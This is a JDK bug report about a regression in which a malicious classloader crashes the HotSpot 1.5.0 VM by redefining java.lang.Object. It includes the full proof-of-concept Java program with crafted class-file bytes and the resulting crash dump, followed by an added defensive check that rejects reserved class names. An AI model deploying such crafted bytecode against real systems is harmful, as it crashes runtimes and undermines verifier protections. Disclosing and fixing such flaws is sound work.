JDK-6194361

REGRESSION: Errant classloader crashes jvm when trying to redefine java.lang.Object

Details

    • b65
    • x86
    • windows_2000

    Description

      FULL PRODUCT VERSION :
      java version "1.5.0"
      Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64)
      Java HotSpot(TM) Client VM (build 1.5.0-b64, mixed mode, sharing)

      OS: Windows 2000, WindowsXP


      A DESCRIPTION OF THE PROBLEM :
      There is a known demonstration of a malicious classloader that tries to
      redefine java.lang.Object. This program has crashed VMs right up to 1.4.1,
      but interestingly 1.4.2 rejects the program with a VerifyError.

      But in 1.4.2_06, it does not crash.

      import java.io.*;

      class Crash extends ClassLoader
      {
        /*
      package java.lang;

      public class Object
      {
        int field;
        public boolean equals(Object o) { System.out.println(o.field); return false; }
      }
        */
       
        static byte[] buf = {
      (byte)0xCA, (byte)0xFE, (byte)0xBA, (byte)0xBE, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x30, (byte)0x00, (byte)0x1B, (byte)0x01,
      (byte)0x00, (byte)0x10, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x6C, (byte)0x61, (byte)0x6E, (byte)0x67,
      (byte)0x2F, (byte)0x4F, (byte)0x62, (byte)0x6A, (byte)0x65, (byte)0x63, (byte)0x74, (byte)0x07, (byte)0x00, (byte)0x01, (byte)0x01,
      (byte)0x00, (byte)0x05, (byte)0x66, (byte)0x69, (byte)0x65, (byte)0x6C, (byte)0x64, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x49,
      (byte)0x01, (byte)0x00, (byte)0x06, (byte)0x65, (byte)0x71, (byte)0x75, (byte)0x61, (byte)0x6C, (byte)0x73, (byte)0x01, (byte)0x00,
      (byte)0x15, (byte)0x28, (byte)0x4C, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x6C, (byte)0x61, (byte)0x6E,
      (byte)0x67, (byte)0x2F, (byte)0x4F, (byte)0x62, (byte)0x6A, (byte)0x65, (byte)0x63, (byte)0x74, (byte)0x3B, (byte)0x29, (byte)0x5A,
      (byte)0x01, (byte)0x00, (byte)0x04, (byte)0x43, (byte)0x6F, (byte)0x64, (byte)0x65, (byte)0x01, (byte)0x00, (byte)0x0F, (byte)0x4C,
      (byte)0x69, (byte)0x6E, (byte)0x65, (byte)0x4E, (byte)0x75, (byte)0x6D, (byte)0x62, (byte)0x65, (byte)0x72, (byte)0x54, (byte)0x61,
      (byte)0x62, (byte)0x6C, (byte)0x65, (byte)0x01, (byte)0x00, (byte)0x03, (byte)0x6F, (byte)0x75, (byte)0x74, (byte)0x01, (byte)0x00,
      (byte)0x15, (byte)0x4C, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x69, (byte)0x6F, (byte)0x2F, (byte)0x50,
      (byte)0x72, (byte)0x69, (byte)0x6E, (byte)0x74, (byte)0x53, (byte)0x74, (byte)0x72, (byte)0x65, (byte)0x61, (byte)0x6D, (byte)0x3B,
      (byte)0x0C, (byte)0x00, (byte)0x09, (byte)0x00, (byte)0x0A, (byte)0x01, (byte)0x00, (byte)0x10, (byte)0x6A, (byte)0x61, (byte)0x76,
      (byte)0x61, (byte)0x2F, (byte)0x6C, (byte)0x61, (byte)0x6E, (byte)0x67, (byte)0x2F, (byte)0x53, (byte)0x79, (byte)0x73, (byte)0x74,
      (byte)0x65, (byte)0x6D, (byte)0x07, (byte)0x00, (byte)0x0C, (byte)0x09, (byte)0x00, (byte)0x0D, (byte)0x00, (byte)0x0B, (byte)0x0C,
      (byte)0x00, (byte)0x03, (byte)0x00, (byte)0x04, (byte)0x09, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x0F, (byte)0x01, (byte)0x00,
      (byte)0x07, (byte)0x70, (byte)0x72, (byte)0x69, (byte)0x6E, (byte)0x74, (byte)0x6C, (byte)0x6E, (byte)0x01, (byte)0x00, (byte)0x04,
      (byte)0x28, (byte)0x49, (byte)0x29, (byte)0x56, (byte)0x0C, (byte)0x00, (byte)0x11, (byte)0x00, (byte)0x12, (byte)0x01, (byte)0x00,
      (byte)0x13, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x69, (byte)0x6F, (byte)0x2F, (byte)0x50, (byte)0x72,
      (byte)0x69, (byte)0x6E, (byte)0x74, (byte)0x53, (byte)0x74, (byte)0x72, (byte)0x65, (byte)0x61, (byte)0x6D, (byte)0x07, (byte)0x00,
      (byte)0x14, (byte)0x0A, (byte)0x00, (byte)0x15, (byte)0x00, (byte)0x13, (byte)0x01, (byte)0x00, (byte)0x06, (byte)0x3C, (byte)0x69,
      (byte)0x6E, (byte)0x69, (byte)0x74, (byte)0x3E, (byte)0x01, (byte)0x00, (byte)0x03, (byte)0x28, (byte)0x29, (byte)0x56, (byte)0x01,
      (byte)0x00, (byte)0x0A, (byte)0x53, (byte)0x6F, (byte)0x75, (byte)0x72, (byte)0x63, (byte)0x65, (byte)0x46, (byte)0x69, (byte)0x6C,
      (byte)0x65, (byte)0x01, (byte)0x00, (byte)0x0B, (byte)0x4F, (byte)0x62, (byte)0x6A, (byte)0x65, (byte)0x63, (byte)0x74, (byte)0x2E,
      (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x00, (byte)0x21, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x03, (byte)0x00, (byte)0x04, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x05, (byte)0x00, (byte)0x06, (byte)0x00, (byte)0x01, (byte)0x00,
      (byte)0x07, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x28, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x0C, (byte)0xB2, (byte)0x00, (byte)0x0E, (byte)0x2B, (byte)0xB4, (byte)0x00, (byte)0x10, (byte)0xB6, (byte)0x00,
      (byte)0x16, (byte)0x03, (byte)0xAC, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x08, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x0A, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x06, (byte)0x00, (byte)0x0A, (byte)0x00,
      (byte)0x06, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x17, (byte)0x00, (byte)0x18, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x07,
      (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x19, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00,
      (byte)0x01, (byte)0xB1, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x08, (byte)0x00, (byte)0x00, (byte)0x00,
      (byte)0x06, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x03, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x19,
      (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x1A
        };

        public static void main(String[] args) throws Exception
        {
          Crash loader = new Crash();
          Class c = loader.defineClass(buf, 0, buf.length);
          c.newInstance().equals("foo");
        }
      }


      ERROR MESSAGES/STACK TRACES THAT OCCUR :
      #
      # An unexpected error has been detected by HotSpot Virtual Machine:
      #
      # Internal Error (53484152454432554E54494D450E43505001A1), pid=1636, tid=984
      #
      # Java VM: Java HotSpot(TM) Client VM (1.5.0-b64 mixed mode, sharing)

      --------------- T H R E A D ---------------

      Current thread (0x00235710): JavaThread "main" [_thread_in_Java, id=984]

      Stack: [0x00030000,0x00070000), sp=0x0006f5c0, free space=253k
      Native frames: (J=compiled Java code, j=interpreted, Vv=VM code, C=native code)
      V [jvm.dll+0x11182c]
      V [jvm.dll+0x60e50]
      V [jvm.dll+0xe8844]
      V [jvm.dll+0xd2e5e]
      V [jvm.dll+0xd4186]
      V [jvm.dll+0x8155e]
      V [jvm.dll+0x8844c]
      C [java.exe+0x14c0]
      C [java.exe+0x64cd]
      C [KERNEL32.DLL+0x11af6]


      --------------- P R O C E S S ---------------

      Java Threads: ( => current thread )
        0x0099c4a8 JavaThread "Low Memory Detector" daemon [_thread_blocked, id=1664]
        0x0099afb0 JavaThread "CompilerThread0" daemon [_thread_blocked, id=1660]
        0x0099ab70 JavaThread "Signal Dispatcher" daemon [_thread_blocked, id=1656]
        0x009755e8 JavaThread "Finalizer" daemon [_thread_blocked, id=1652]
        0x00974158 JavaThread "Reference Handler" daemon [_thread_blocked, id=1648]
      =>0x00235710 JavaThread "main" [_thread_in_Java, id=984]

      Other Threads:
        0x0023f838 VMThread [id=1632]
        0x009b73a0 WatcherThread [id=1668]

      VM state:not at safepoint (normal execution)

      VM Mutex/Monitor currently owned by a thread: None

      Heap
       def new generation total 576K, used 159K [0x22aa0000, 0x22b40000, 0x22f80000)
        eden space 512K, 31% used [0x22aa0000, 0x22ac7e60, 0x22b20000)
        from space 64K, 0% used [0x22b20000, 0x22b20000, 0x22b30000)
        to space 64K, 0% used [0x22b30000, 0x22b30000, 0x22b40000)
       tenured generation total 1408K, used 0K [0x22f80000, 0x230e0000, 0x26aa0000)
         the space 1408K, 0% used [0x22f80000, 0x22f80000, 0x22f80200, 0x230e0000)
       compacting perm gen total 8192K, used 18K [0x26aa0000, 0x272a0000, 0x2aaa0000)
         the space 8192K, 0% used [0x26aa0000, 0x26aa48d8, 0x26aa4a00, 0x272a0000)
          ro space 8192K, 66% used [0x2aaa0000, 0x2aff7960, 0x2aff7a00, 0x2b2a0000)
          rw space 12288K, 46% used [0x2b2a0000, 0x2b8343a8, 0x2b834400, 0x2bea0000)

      Dynamic libraries:
      0x00400000 - 0x0040c000 c:\apps\sun-jdk\1.5\bin\java.exe
      0x77f80000 - 0x77ffd000 C:\WINNT\system32\ntdll.dll
      0x7c2d0000 - 0x7c332000 C:\WINNT\system32\ADVAPI32.dll
      0x7c570000 - 0x7c628000 C:\WINNT\system32\KERNEL32.DLL
      0x77d30000 - 0x77da1000 C:\WINNT\system32\RPCRT4.DLL
      0x78000000 - 0x78045000 C:\WINNT\system32\MSVCRT.dll
      0x6d640000 - 0x6d7c5000 c:\apps\sun-jdk\1.5\jre\bin\client\jvm.dll
      0x77e10000 - 0x77e75000 C:\WINNT\system32\USER32.dll
      0x77f40000 - 0x77f7e000 C:\WINNT\system32\GDI32.DLL
      0x77570000 - 0x775a0000 C:\WINNT\system32\WINMM.dll
      0x6d280000 - 0x6d288000 c:\apps\sun-jdk\1.5\jre\bin\hpi.dll
      0x690a0000 - 0x690ab000 C:\WINNT\system32\PSAPI.DLL
      0x6d610000 - 0x6d61c000 c:\apps\sun-jdk\1.5\jre\bin\verify.dll
      0x6d300000 - 0x6d31d000 c:\apps\sun-jdk\1.5\jre\bin\java.dll
      0x6d630000 - 0x6d63f000 c:\apps\sun-jdk\1.5\jre\bin\zip.dll

      VM Arguments:
      java_command: Crash

      Environment Variables:
      PATH=c:\apps\sun-jdk\1.5\bin;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;G:\apps\GNU\WINCVS~1.3\cvsnt;C:\Program Files\Common Files\Adaptec Shared\System;c:\apps\bin;c:\apps\PuTTy;"g:\apps\gnu\wincvs 1.3\cvsnt"
      USERNAME=dholmes
      OS=Windows_NT
      PROCESSOR_IDENTIFIER=x86 Family 6 Model 8 Stepping 10, GenuineIntel


      --------------- S Y S T E M ---------------

      OS: Windows 2000 Build 2195 Service Pack 4

      CPU:total 1 family 6, cmov, cx8, fxsr, mmx, sse

      Memory: 4k page, physical 523676k(307980k free), swap 884668k(671220k free)

      vm_info: Java HotSpot(TM) Client VM (1.5.0-b64) for windows-x86, built on Sep 15 2004 03:00:31 by "java_re" with MS VC++ 6.0

      Release Regression From : 1.4.2_06
      The above release value was the last known release where this
      bug was known to work. Since then there has been a regression.
      ###@###.### 2004-11-11 23:51:16 GMT

          People

            kamg Keith Mcguigan (Inactive)
            rmandalasunw Ranjith Mandala (Inactive)
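
As an added example (not part of the original report and not the JDK's own code): a pre-check an application can run on untrusted class bytes before passing them to defineClass. It reads the class-file header to find the name the bytes declare, which for the array in the report is java/lang/Object. The class name DeclaredNameCheck, the isReserved policy and the sample bytes are assumptions constructed for illustration.

```java
import java.io.*;

public class DeclaredNameCheck {
    /** Returns the internal name the class file declares as this_class, e.g. "java/lang/Object". */
    static String declaredName(byte[] classFile) throws IOException {
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(classFile));
        if (in.readInt() != 0xCAFEBABE) throw new IOException("bad magic");
        in.readInt();                                    // minor_version, major_version
        int count = in.readUnsignedShort();              // constant_pool_count
        String[] utf8 = new String[count];
        int[] nameIndex = new int[count];                // name_index of each CONSTANT_Class
        for (int i = 1; i < count; i++) {
            int tag = in.readUnsignedByte();
            switch (tag) {
                case 1: utf8[i] = in.readUTF(); break;                  // Utf8: u2 length + bytes
                case 7: nameIndex[i] = in.readUnsignedShort(); break;   // Class
                case 8: case 16: case 19: case 20: in.readFully(new byte[2]); break;
                case 15: in.readFully(new byte[3]); break;
                case 3: case 4: case 9: case 10: case 11: case 12: case 17: case 18:
                    in.readFully(new byte[4]); break;
                case 5: case 6: in.readFully(new byte[8]); i++; break;  // long/double use two slots
                default: throw new IOException("unknown constant pool tag " + tag);
            }
        }
        in.readUnsignedShort();                          // access_flags
        int thisClass = in.readUnsignedShort();
        int n = thisClass < count ? nameIndex[thisClass] : 0;
        if (n == 0 || n >= count || utf8[n] == null) throw new IOException("bad this_class");
        return utf8[n];
    }

    /** Policy assumed for this example: an application loader never defines java.* classes. */
    static boolean isReserved(String internalName) {
        return internalName.startsWith("java/");
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a class file truncated just after this_class.
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(bytes);
        out.writeInt(0xCAFEBABE); out.writeShort(0); out.writeShort(0x30);
        out.writeShort(3);                               // constant_pool_count
        out.writeByte(1); out.writeUTF("java/lang/Object");
        out.writeByte(7); out.writeShort(1);
        out.writeShort(0x21); out.writeShort(2);         // access_flags, this_class = #2
        String name = declaredName(bytes.toByteArray());
        System.out.println(name + " reserved=" + isReserved(name));
    }
}
```

Malformed input (bad magic, an unknown constant pool tag, a truncated pool or an out-of-range this_class) surfaces as an IOException, so a caller can treat any exception as a reason to refuse the bytes.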